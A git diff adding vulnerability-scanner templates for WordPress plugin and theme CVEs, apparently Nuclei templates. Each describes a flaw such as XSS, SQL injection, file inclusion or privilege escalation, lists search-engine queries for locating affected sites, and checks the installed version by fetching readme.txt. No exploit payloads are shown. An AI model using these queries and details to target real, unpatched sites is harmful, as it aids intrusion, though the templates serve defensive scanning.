diff --git a/poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml b/poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml
new file mode 100644
index 0000000000..9d9db1f1c3
--- /dev/null
+++ b/poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f
+
+info:
+ name: >
+ AI Quiz | Quiz Maker <= 1.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
+ author: topscoder
+ severity: low
+ description: >
+ The AI Quiz | Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ai_quiz_update_style() function in all versions up to, and including, 1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53591a3b-8a99-40e2-8145-1d7785bcbab4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-11323
+ metadata:
+ fofa-query: "wp-content/plugins/ai-quiz/"
+ google-query: inurl:"/wp-content/plugins/ai-quiz/"
+ shodan-query: 'vuln:CVE-2024-11323'
+ tags: cve,wordpress,wp-plugin,ai-quiz,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ai-quiz/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ai-quiz"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11324.yaml b/poc/cve/CVE-2024-11324.yaml
new file mode 100644
index 0000000000..1adfc3c928
--- /dev/null
+++ b/poc/cve/CVE-2024-11324.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11324
+
+info:
+ name: >
+ Accounting for WooCommerce <= 1.6.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Accounting for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11324
+ metadata:
+ fofa-query: "wp-content/plugins/accounting-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/accounting-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-11324'
+ tags: cve,wordpress,wp-plugin,accounting-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/accounting-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "accounting-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml b/poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml
new file mode 100644
index 0000000000..eac6d981c0
--- /dev/null
+++ b/poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11336-3e061f8446314ee414179038a3da58ff
+
+info:
+ name: >
+ Clickbank WordPress Plugin (Storefront) <= 1.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Clickbank WordPress Plugin (Storefront) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7. This is due to missing or incorrect nonce validation via the cs_menu page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/57789905-1e08-41c5-bfda-b1d6d33de4c0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11336
+ metadata:
+ fofa-query: "wp-content/plugins/clickbank-storefront/"
+ google-query: inurl:"/wp-content/plugins/clickbank-storefront/"
+ shodan-query: 'vuln:CVE-2024-11336'
+ tags: cve,wordpress,wp-plugin,clickbank-storefront,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clickbank-storefront/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clickbank-storefront"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml b/poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml
new file mode 100644
index 0000000000..2855a5dd63
--- /dev/null
+++ b/poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml
@@ -0,0 +1,60 @@
+id: CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1
+
+info:
+ name: >
+ Smart PopUp Blaster <= 1.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's
+ 'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e10f391a-6663-4222-8266-ab911c588b76?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11339
+ metadata:
+ fofa-query: "wp-content/plugins/smart-popup-blaster/"
+ google-query: inurl:"/wp-content/plugins/smart-popup-blaster/"
+ shodan-query: 'vuln:CVE-2024-11339'
+ tags: cve,wordpress,wp-plugin,smart-popup-blaster,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smart-popup-blaster/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smart-popup-blaster"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11341.yaml b/poc/cve/CVE-2024-11341.yaml
new file mode 100644
index 0000000000..1b65d3b4dd
--- /dev/null
+++ b/poc/cve/CVE-2024-11341.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11341
+
+info:
+ name: >
+ Simple Redirection <= 1.5 - Cross-Site Request Forgery to Arbitrary Site Redirect
+ author: topscoder
+ severity: medium
+ description: >
+ The Simple Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and redirect all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fa84344-8672-43e1-a430-094021f7366f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-11341
+ metadata:
+ fofa-query: "wp-content/plugins/eelv-redirection/"
+ google-query: inurl:"/wp-content/plugins/eelv-redirection/"
+ shodan-query: 'vuln:CVE-2024-11341'
+ tags: cve,wordpress,wp-plugin,eelv-redirection,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/eelv-redirection/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "eelv-redirection"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml b/poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml
new file mode 100644
index 0000000000..482b828121
--- /dev/null
+++ b/poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11352-2956a03392350547f722d5c5b1052818
+
+info:
+ name: >
+ TwentyTwenty <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The TwentyTwenty plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'twentytwenty' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f805982-1141-4e28-b28c-93483646cf99?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11352
+ metadata:
+ fofa-query: "wp-content/plugins/twentytwenty/"
+ google-query: inurl:"/wp-content/plugins/twentytwenty/"
+ shodan-query: 'vuln:CVE-2024-11352'
+ tags: cve,wordpress,wp-plugin,twentytwenty,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/twentytwenty/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "twentytwenty"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml b/poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml
new file mode 100644
index 0000000000..fe1357f9ad
--- /dev/null
+++ b/poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6
+
+info:
+ name: >
+ Splash Sync <= 2.0.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Splash Sync plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5be1cfcf-26f1-47d8-a48c-d9f385eb031a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11368
+ metadata:
+ fofa-query: "wp-content/plugins/splash-connector/"
+ google-query: inurl:"/wp-content/plugins/splash-connector/"
+ shodan-query: 'vuln:CVE-2024-11368'
+ tags: cve,wordpress,wp-plugin,splash-connector,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/splash-connector/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "splash-connector"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml b/poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml
new file mode 100644
index 0000000000..b8559ffe81
--- /dev/null
+++ b/poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc
+
+info:
+ name: >
+ Broadcast <= 51.01 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Broadcast plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'do_check' parameter in all versions up to, and including, 51.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects multi-site installations.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9bf506f-17b1-4ec3-87ce-1ed78db6fb0b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11379
+ metadata:
+ fofa-query: "wp-content/plugins/threewp-broadcast/"
+ google-query: inurl:"/wp-content/plugins/threewp-broadcast/"
+ shodan-query: 'vuln:CVE-2024-11379'
+ tags: cve,wordpress,wp-plugin,threewp-broadcast,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/threewp-broadcast/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "threewp-broadcast"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 51.01')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11420.yaml b/poc/cve/CVE-2024-11420.yaml
new file mode 100644
index 0000000000..028d664068
--- /dev/null
+++ b/poc/cve/CVE-2024-11420.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11420
+
+info:
+ name: >
+ Blocksy <= 2.0.77 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Blocksy theme for WordPress is vulnerable to Stored Cross-Site Scripting via the Contact Info Block link parameter in all versions up to, and including, 2.0.77 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/02ad47d5-f011-4e0a-af29-088852d1e886?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11420
+ metadata:
+ fofa-query: "wp-content/themes/blocksy/"
+ google-query: inurl:"/wp-content/themes/blocksy/"
+ shodan-query: 'vuln:CVE-2024-11420'
+ tags: cve,wordpress,wp-theme,blocksy,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/blocksy/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "blocksy"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.77')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11429.yaml b/poc/cve/CVE-2024-11429.yaml
new file mode 100644
index 0000000000..3266903b50
--- /dev/null
+++ b/poc/cve/CVE-2024-11429.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11429
+
+info:
+ name: >
+ Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews – Stars Testimonials <= 3.3.3 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews – Stars Testimonials plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'stars-testimonials-with-slider-and-masonry-grid' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/68250b6c-22c8-494f-b0b0-62b80cc4de0c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-11429
+ metadata:
+ fofa-query: "wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/"
+ google-query: inurl:"/wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/"
+ shodan-query: 'vuln:CVE-2024-11429'
+ tags: cve,wordpress,wp-plugin,stars-testimonials-with-slider-and-masonry-grid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "stars-testimonials-with-slider-and-masonry-grid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml b/poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
new file mode 100644
index 0000000000..0d113c79a7
--- /dev/null
+++ b/poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef
+
+info:
+ name: >
+ CLUEVO LMS, E-Learning Platform <= 1.13.2 - Cross-Site Request Forgery to Module Deletion
+ author: topscoder
+ severity: medium
+ description: >
+ The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.13.2. This is due to missing or incorrect nonce validation on the cluevo_render_module_ui() function. This makes it possible for unauthenticated attackers to delete modules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-11444
+ metadata:
+ fofa-query: "wp-content/plugins/cluevo-lms/"
+ google-query: inurl:"/wp-content/plugins/cluevo-lms/"
+ shodan-query: 'vuln:CVE-2024-11444'
+ tags: cve,wordpress,wp-plugin,cluevo-lms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cluevo-lms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cluevo-lms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml b/poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
new file mode 100644
index 0000000000..07e13f5eb2
--- /dev/null
+++ b/poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11450-aa0eea523b63076daf425f6ddb400979
+
+info:
+ name: >
+ ONLYOFFICE Docs <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The ONLYOFFICE Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/80b71264-5b0f-41cb-86c1-a052d1976597?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11450
+ metadata:
+ fofa-query: "wp-content/plugins/onlyoffice/"
+ google-query: inurl:"/wp-content/plugins/onlyoffice/"
+ shodan-query: 'vuln:CVE-2024-11450'
+ tags: cve,wordpress,wp-plugin,onlyoffice,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/onlyoffice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "onlyoffice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml b/poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml
new file mode 100644
index 0000000000..9adc1bc373
--- /dev/null
+++ b/poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f
+
+info:
+ name: >
+ Verowa Connect <= 3.0.1 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Verowa Connect plugin for WordPress is vulnerable to SQL Injection via the 'search_string' parameter in all versions up to, and including, 3.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da47f6-4cfe-480e-9472-bd5efc8bac71?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-11460
+ metadata:
+ fofa-query: "wp-content/plugins/verowa-connect/"
+ google-query: inurl:"/wp-content/plugins/verowa-connect/"
+ shodan-query: 'vuln:CVE-2024-11460'
+ tags: cve,wordpress,wp-plugin,verowa-connect,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/verowa-connect/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "verowa-connect"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml b/poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml
new file mode 100644
index 0000000000..51b2ff7c90
--- /dev/null
+++ b/poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf
+
+info:
+ name: >
+ WP Hide & Security Enhancer <= 2.5.1 - Missing Authorization to Unauthenticated Arbitrary File Contents Deletion
+ author: topscoder
+ severity: high
+ description: >
+ The WP Hide & Security Enhancer plugin for WordPress is vulnerable to arbitrary file contents deletion due to a missing authorization and insufficient file path validation in the file-process.php in all versions up to, and including, 2.5.1. This makes it possible for unauthenticated attackers to delete the contents of arbitrary files on the server, which can break the site or lead to data loss.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/43c7056e-39d8-467e-92ec-33a31e5dafc9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-11585
+ metadata:
+ fofa-query: "wp-content/plugins/wp-hide-security-enhancer/"
+ google-query: inurl:"/wp-content/plugins/wp-hide-security-enhancer/"
+ shodan-query: 'vuln:CVE-2024-11585'
+ tags: cve,wordpress,wp-plugin,wp-hide-security-enhancer,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
